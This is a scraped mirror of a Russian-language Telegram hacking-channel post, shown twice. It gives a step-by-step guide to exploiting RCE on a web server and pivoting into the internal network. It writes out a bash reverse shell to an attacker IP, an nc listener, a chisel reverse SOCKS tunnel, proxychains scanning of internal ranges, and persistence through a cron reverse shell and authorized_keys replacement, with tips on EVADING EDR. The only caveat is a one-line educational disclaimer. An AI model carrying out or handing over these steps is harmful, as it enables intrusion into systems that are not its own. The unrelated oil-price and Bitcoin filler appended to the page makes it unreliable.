Warning: mkdir(): No space left on device in /var/www/tg-me/post.php on line 37

Warning: file_put_contents(aCache/aDaily/post/hackproglib/--): Failed to open stream: No such file or directory in /var/www/tg-me/post.php on line 50
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность | Telegram Webview: hackproglib/4116 -
Telegram Group & Telegram Channel
Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM



tg-me.com/hackproglib/4116
Create:
Last Update:

Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст

BY Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность




Share with your friend now:
tg-me.com/hackproglib/4116

View MORE
Open in Telegram


Библиотека хакера | Hacking Infosec ИБ информационная безопасность Telegram | DID YOU KNOW?

Date: |

Traders also expressed uncertainty about the situation with China Evergrande, as the indebted property company has not provided clarification about a key interest payment.In economic news, the Commerce Department reported an unexpected increase in U.S. new home sales in August.Crude oil prices climbed Friday and front-month WTI oil futures contracts saw gains for a fifth straight week amid tighter supplies. West Texas Intermediate Crude oil futures for November rose $0.68 or 0.9 percent at 73.98 a barrel. WTI Crude futures gained 2.8 percent for the week.

How to Invest in Bitcoin?

Like a stock, you can buy and hold Bitcoin as an investment. You can even now do so in special retirement accounts called Bitcoin IRAs. No matter where you choose to hold your Bitcoin, people’s philosophies on how to invest it vary: Some buy and hold long term, some buy and aim to sell after a price rally, and others bet on its price decreasing. Bitcoin’s price over time has experienced big price swings, going as low as $5,165 and as high as $28,990 in 2020 alone. “I think in some places, people might be using Bitcoin to pay for things, but the truth is that it’s an asset that looks like it’s going to be increasing in value relatively quickly for some time,” Marquez says. “So why would you sell something that’s going to be worth so much more next year than it is today? The majority of people that hold it are long-term investors.”

Библиотека хакера | Hacking Infosec ИБ информационная безопасность from us


Telegram Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
FROM USA